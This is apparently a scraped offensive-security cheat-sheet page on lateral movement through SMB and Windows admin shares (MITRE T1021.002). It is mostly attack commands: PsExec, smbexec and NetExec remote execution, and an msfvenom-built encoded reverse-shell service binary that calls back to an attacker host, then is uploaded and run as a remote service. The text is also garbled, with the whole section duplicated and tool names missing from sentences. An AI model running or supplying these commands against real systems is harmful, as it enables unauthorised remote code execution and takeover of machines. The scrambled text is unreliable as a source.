SMB-based

MITRE ATT&CK™ Remote Services: SMB/Windows Admin Shares - Technique T1021.002

Last updated 1 year ago

Was this helpful?

SMB-based

MITRE ATT&CK™ Remote Services: SMB/Windows Admin Shares - Technique T1021.002

Theory

can be abuse by attackers to execute remote code and perform lateral movements.

Practice

PsExec

Psexec is one of many Sysinternals Tools and can be downloaded , It connect to the $ADMIN shares with SMB and upload a service binary. Psexec uses psexesvc.exe as the name. Then it connect to the service control manager to create and run a service named PSEXESVC associated with the previous binary. Finally Psexec create some named pipes to handle stdin/stdout/stderr.

The script can execute a remote process.

psexec.py username:password@10.10.10.10 cmd.exe

We may manually replicate techniques use by PsExec with from impacket

# Create an exe as a service
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKING_IP> LPORT=<PORT> -f exe-service --platform windows -e x64/xor_dynamic  -o shell.exe

# Upload the exe to windows machine
smbclient '\\<TARGET>\smbshare' -U <user> -c "put shell.exe test.exe"

# Using impacket services.py create service remotely
services.py WORKGROUP/<user>@<TARGET> create -name shell-svc -display my-shell-svc -path "\\\\<TARGET>\\smbshare\\shell.exe"

# Using impacket services.py start the service and get the shell
services.py WORKGROUP/<user>@<TARGET> start -name shell-svc

On windows, we can use from Windows Sysinternals tools

#Run PsExec
psexec64.exe \\MACHINE_IP -u Administrator -p Mypass123 -i cmd.exe

SmbExec

#Semi-interactive shell (doesn't need writable share on the target)
smbexec.py <domain>/<username>:<password>@<host>

NetExec

#Execute cmd command through smbexec method (methods: mmcexec,atexec,smbexec,wmiexec)
netexec smb <TARGET> -u <USER> -p <PASSWORD> --exec-method smbexec -x whoami

#Execute powershell command through atexec method (methods: mmcexec,atexec,smbexec,wmiexec)
netexec smb <TARGET> -u <USER> -p <PASSWORD> --exec-method atexec -X whoami

#Execute powershell (32bits) command through default wmiexec method (methods: mmcexec,atexec,smbexec,wmiexec)
netexec smb <TARGET> -u <USER> -p <PASSWORD> --force-ps32 -X whoami

Last updated 1 year ago

Was this helpful?

Theory

can be abuse by attackers to execute remote code and perform lateral movements.

Practice

PsExec

The script can execute a remote process.

psexec.py username:password@10.10.10.10 cmd.exe

We may manually replicate techniques use by PsExec with from impacket

# Create an exe as a service
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKING_IP> LPORT=<PORT> -f exe-service --platform windows -e x64/xor_dynamic  -o shell.exe

# Upload the exe to windows machine
smbclient '\\<TARGET>\smbshare' -U <user> -c "put shell.exe test.exe"

# Using impacket services.py create service remotely
services.py WORKGROUP/<user>@<TARGET> create -name shell-svc -display my-shell-svc -path "\\\\<TARGET>\\smbshare\\shell.exe"

# Using impacket services.py start the service and get the shell
services.py WORKGROUP/<user>@<TARGET> start -name shell-svc

On windows, we can use from Windows Sysinternals tools

#Run PsExec
psexec64.exe \\MACHINE_IP -u Administrator -p Mypass123 -i cmd.exe

SmbExec

SmbExec is an script that works similarly to PsExec without using RemComSvc. The main difference is that smbexec avoids transferring a potentially detectable binary to the target site. Instead, it lives completely off the land by running the local Windows command shell. implementation goes one step further, instantiating a local smbserver to receive the output of the commands. This is useful in the situation where the target machine does NOT have a writeable share available.

The script can execute a remote process.

#Semi-interactive shell (doesn't need writable share on the target)
smbexec.py <domain>/<username>:<password>@<host>

NetExec

You can utilize as a powerful alternative to SMBexec or PsExec for executing code over SMB connections. You can specify the execution methode and the shell interpretor (cmd or powershell.

can execute a remote process.

#Execute cmd command through smbexec method (methods: mmcexec,atexec,smbexec,wmiexec)
netexec smb <TARGET> -u <USER> -p <PASSWORD> --exec-method smbexec -x whoami

#Execute powershell command through atexec method (methods: mmcexec,atexec,smbexec,wmiexec)
netexec smb <TARGET> -u <USER> -p <PASSWORD> --exec-method atexec -X whoami

#Execute powershell (32bits) command through default wmiexec method (methods: mmcexec,atexec,smbexec,wmiexec)
netexec smb <TARGET> -u <USER> -p <PASSWORD> --force-ps32 -X whoami